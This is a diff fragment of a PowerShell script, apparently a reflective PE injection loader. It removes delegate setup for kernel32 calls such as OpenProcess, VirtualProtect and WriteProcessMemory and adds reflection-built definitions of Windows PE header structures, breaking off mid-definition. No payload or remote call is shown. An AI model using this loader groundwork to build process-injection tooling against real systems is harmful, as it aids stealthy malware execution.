-		$VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
-		$VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
-		$VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
-		$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
-		
-		$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
-		$VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
-		$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
-		$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
-		
-		$GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
-		$GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
-		$GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
-		$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
-		
-		$FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
-		$FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
-		$FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
-		
-		$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
-	    $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
-	    $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
-		
-		$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
-	    $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
-	    $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
-		
-		$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
+    )
+
+    ###################################
+    ##########  Win32 Stuff  ##########
+    ###################################
+    Function Get-Win32Types
+    {
+        $Win32Types = New-Object System.Object
+
+        #Define all the structures/enums that will be used
+        #   This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
+        $Domain = [AppDomain]::CurrentDomain
+        $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
+        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
+        $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
+
+
+        ############    ENUM    ############
+        #Enum MachineType
+        $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
+        $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
+        $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
+        $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
+        $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
+        $MachineType = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
+
+        #Enum MagicType
+        $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
+        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
+        $MagicType = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
+
+        #Enum SubSystemType
+        $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
+        $SubSystemType = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
+
+        #Enum DllCharacteristicsType
+        $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
+        $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
+        $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
+        $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
+        $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
+        $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
+        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
+        $DllCharacteristicsType = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
+
+        ###########    STRUCT    ###########
+        #Struct IMAGE_DATA_DIRECTORY
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
+        ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
+        ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
+        $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
+
+        #Struct IMAGE_FILE_HEADER
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
+        $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
+        $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
+
+        #Struct IMAGE_OPTIONAL_HEADER64
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
+        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
+        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
+        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
+        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
+        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
+        ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
+        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
+        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
+        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
+        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
+        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
+        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
+        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
+        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
+        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
+        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
+        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
+        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
+        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
+        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
+        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
+        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
+        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
+        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
+        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
+        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
+        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
+        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
+        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
+        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
+        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
+        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
+        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
+        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
+        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
+        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
+        $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
+
+        #Struct IMAGE_OPTIONAL_HEADER32
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
+        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
+        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
+        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
+        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
+        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
+        ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
+        ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
+        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
+        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
+        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
+        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
+        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
+        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
+        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
+        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
+        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
+        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
+        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
+        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
+        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
+        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
+        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
+        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
+        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
+        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
+        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
+        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
+        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
+        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
+        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
+        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
+        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
+        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
+        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
+        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
+        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
+        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
+        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
+        $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
+
+        #Struct IMAGE_NT_HEADERS64
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
+        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
+        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
+        $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
+
+        #Struct IMAGE_NT_HEADERS32
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
+        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
+        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
+        $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
+
+        #Struct IMAGE_DOS_HEADER
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
+        $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
+
+        $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
+        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
+        $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
+        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
+        $e_resField.SetCustomAttribute($AttribBuilder)
+
+        $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
+
+        $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
+        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
+        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
+        $e_res2Field.SetCustomAttribute($AttribBuilder)
+
+        $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
+        $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
+
+        #Struct IMAGE_SECTION_HEADER
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
+
+        $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
+        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
+        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
+        $nameField.SetCustomAttribute($AttribBuilder)
+
+        $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
+        $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
+
+        #Struct IMAGE_BASE_RELOCATION
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
+        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
+        $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
+
+        #Struct IMAGE_IMPORT_DESCRIPTOR
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
+        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
+        $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
+
+        #Struct IMAGE_EXPORT_DIRECTORY
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
+        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
+        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
+        $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
